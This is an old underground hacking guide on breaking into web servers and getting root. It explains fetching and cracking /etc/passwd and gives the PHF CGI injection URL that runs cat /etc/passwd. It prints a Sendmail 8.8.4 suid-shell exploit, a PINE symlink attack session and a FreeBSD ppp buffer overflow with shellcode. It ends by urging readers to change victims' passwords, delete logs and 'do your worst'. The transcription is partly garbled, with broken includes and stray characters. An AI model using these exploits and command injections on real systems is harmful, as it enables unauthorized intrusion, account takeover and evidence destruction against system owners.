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Hacking Webpage - The Ultimate guide
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  Well Psychotic wrote one of the most helpful unix text files in cyberspace but
with the mail that we
  recieved after the release of our famous 36 page Unix Bible we realised that unix
isn't for everybody so
  we decided that we should write on another aspect of hacking..... Virtual Circuit
and Psychotic is proud to release, "Hacking Webpages With a few Other Techniques." We will discuss a few
various ways of hacking
  webpages and getting root. We are also going to interview and question other REAL
hackers on the
  subjects.
  Getting the Password File Through FTP
  Ok well one of the easiest ways of getting superuser access is through anonymous
ftp access into a
  webpage. First you need learn a little about the password file...
  root:User:d7Bdg:1n2HG2:1127:20:Superuser
  TomJones:p5Y(hŌtiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
  BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
  This is an example of a regular encrypted password file. The Superuser is the
part that gives you root.
  That's the main part of the file.
  root:x:0:1:Superuser:/:
  ftp:x:202:102:Anonymous ftp:/ul/ftp:
  ftpadmin:x:203:102:ftp Administrator:/u1/ftp
  This is another example of a password file, only this one has one little
difference, it's shadowed.
  Shadowed password files don't let you view or copy the actual encrypted password.
This causes problems
  for the password cracker and dictionary maker(both explained later in the text).
Below is another
  example of a shadowed password file:
  root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
  daemon:x:1:1:0000-Admin(0000):/:
  bin:x:2:2:0000-Admin(0000):/usr/bin:
  sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
  uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
  nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
  listen:x:37:4:Network Admin:/usr/net/nls:
  nobody:x:60001:60001:uid no body:/:
  noaccess:x:60002:60002:uid no access:/:
  webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
  pin4geo:x:55:55:PinPaper
Admin: /export/home/webmastr/new/gregy/test/pin4geo:/bin/false
  ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
  Shadowed password files have an "x" in the place of a password or sometimes they
are disquised as an
  * as well.
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Now that you know a little more about what the actual password file looks like you should be able to

identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it.

Cracking a password file isn't as complicated as it would seem, although the files vary from system to

system. 1. The first step that you would take is to download or copy the file. 2. The second step is to find

a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there

are a few ok ones out there. I recomend that you look for Cracker Jack, John the Ripper, Brute Force

Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... when you start a cracking

prog you will be asked to find the the password file. That's where a dictionary maker comes in. You can

download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter

combinations with the alphabet that you choose(ASCII, caps, lowercase, and numeric letters may also be

added). We will be releasing our pasword file to the public soon, it will be called, Psychotic Candy, "The

Perfect Drug." As far as we know it will be one of the largest in circulation. 3. You then start up the

cracker and follow the directions that it gives you.

The PHF Technique

Well I wasn't sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it.

The phf technique is by far the easiest way of getting a password file(although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link:

http://webpage\_goes\_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

You replace the webpage\_goes\_here with the domain. So if you were trying to get the pw file for www.webpage.com you would type:

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd and that's it! You just sit back and copy the file(if it works).

Telnet and Exploits

Well exploits are the best way of hacking webpages but they are also more complicated then hacking

through ftp or using the phf. Before you can setup an exploit you must first have a telnet proggie, there

are many different clients you can just do a netsearch and find everything you need.

It's best to get an account with your target(if possible) and view the glitches from the inside out. Exploits

expose errors or bugs in systems and usually allow you to gain root access. There are many different

exploits around and you can view each seperately. I'm going to list a few below Side 2

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but the list of exploits is
  endless.
  This exploit is known as Sendmail v.8.8.4
  It creates a suid program / tmp/x that calls shell as root. This is how you set it
up:
  cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
  #include
  main()
  execl(RUN,RUN,NULL);
  }
  _EOF_
  cat << _EOF_ >/tmp/spawnfish.c
  main()
  execl("/usr/lib/sendmail","/tmp/smtpd",0);
  _EOF_
  cat << _EOF_ >/tmp/smtpd.c
  main()
  setuid(0); setgid(0);
  system("chown root /tmp/x ;chmod 4755 /tmp/x");
 _EOF_
#
  qcc - 0 - o /tmp/x /tmp/x.c
  gcc -03 -o /tmp/spawnfish /tmp/spawnfish.c
  qcc -03 -o /tmp/smtpd /tmp/smtpd.c
  /tmp/spawnfish
  kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" "
-f1
  rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
  sleep 5
  if [ -u /tmp/x ] ; then
echo "leet..."
  /tmp/x
fi
  and now on to another exploit. I'm going to display the pine exploit through
linux. By watching the
  process table with ps to see which users are running PINE, one can then do an 1s
in /tmp/ to gather the
  lockfile names for each user. Watching the process table once again will now
reveal when each user quits
  PINE or runs out of unread messages in their INBOX, effectively deleting the
respective lockfile.
  Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts(for a
generic example) will
  cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its
contents. One may now
  simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.
  This was writen by Sean B. Hamor...For this example, hamors is the victim while
                                        Side 3
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catluvr is the attacker:
  hamors (21 19:04) litterbox:~> pine
  catluvr (6 19:06) litterbox:~> ps -aux | grep pine
  catluvr 1739 0.0 1.8 100 356 pp3 s 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 s 19:05 0:00 pine
  catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
  - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4
  catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine
  catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
  hamors (23 19:09) litterbox:~> pine
  catluvr (11 19:10) litterbox:~> ps -aux | grep pine
  catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
  catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
  catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
  catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
  catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
  now on to another one, this will be the last one that I'm going to show.
Exploitation script for the ppp
  vulnerbility as described by no one to date, this is NOT FreeBSD-SA-96:15. Works
on FreeBSD as tested.
  Mess with the numbers if it doesnt work. This is how you set it up:
  #include
  #include
  #include
  #define BUFFER_SIZE 156 /* size of the bufer to overflow */
  #define OFFSET -290 /* number of bytes to jump after the start
  of the buffer */
  long get_esp(void) { __asm__("movl %esp,%eax\n"); }
  main(int argc, char *argv[])
  char *buf = NULL;
  unsigned long *addr_ptr = NULL;
  char *ptr = NULL;
  char execshell[] =
  "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\bin/sh\x01\x01\x01\x01" /* 20 bytes */
"\x02\x02\x02\x02\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57
total
  int i,j;
  buf = malloc(4096);
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  /* fill start of bufer with nops */
  i = BUFFER_SIZE-strlen(execshell);
  memset(buf, 0x90, i);
  ptr = buf + i;
  /* place exploit code into the buffer */
  for(i = 0; i < strlen(execshell); i++)</pre>
  *ptr++ = execshell[i];
  addr_ptr = (long *)ptr;
  for(\bar{i}=0; i < (104/4); i++)
  *addr_ptr++ = get_esp() + OFFSET;
  ptr = (char *)addr_ptr;
  *ptr = 0;
  setenv("HOME", buf, 1);
  execl("/usr/sbin/ppp", "ppp", NULL);
  Now that you've gotten root "what's next?" Well the choice is up to you but I
would recommend changing
  the password before you delete or change anything. To change their password all
you have to do is login
  via telnet and login_with your new account. Then you just type: passwd and it
will ask you for the old password first followed by the new one. Now only you will have the new pw and
that should last for a while
  you can now upload you pages, delete all the logs and just plain do your worstJ
Psychotic writes our own
  exploits and we will be releasing them soon, so keep your eyes open for them. We
recommend that if
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you are serious about learing ethnical hacking that you download our Unix Bible.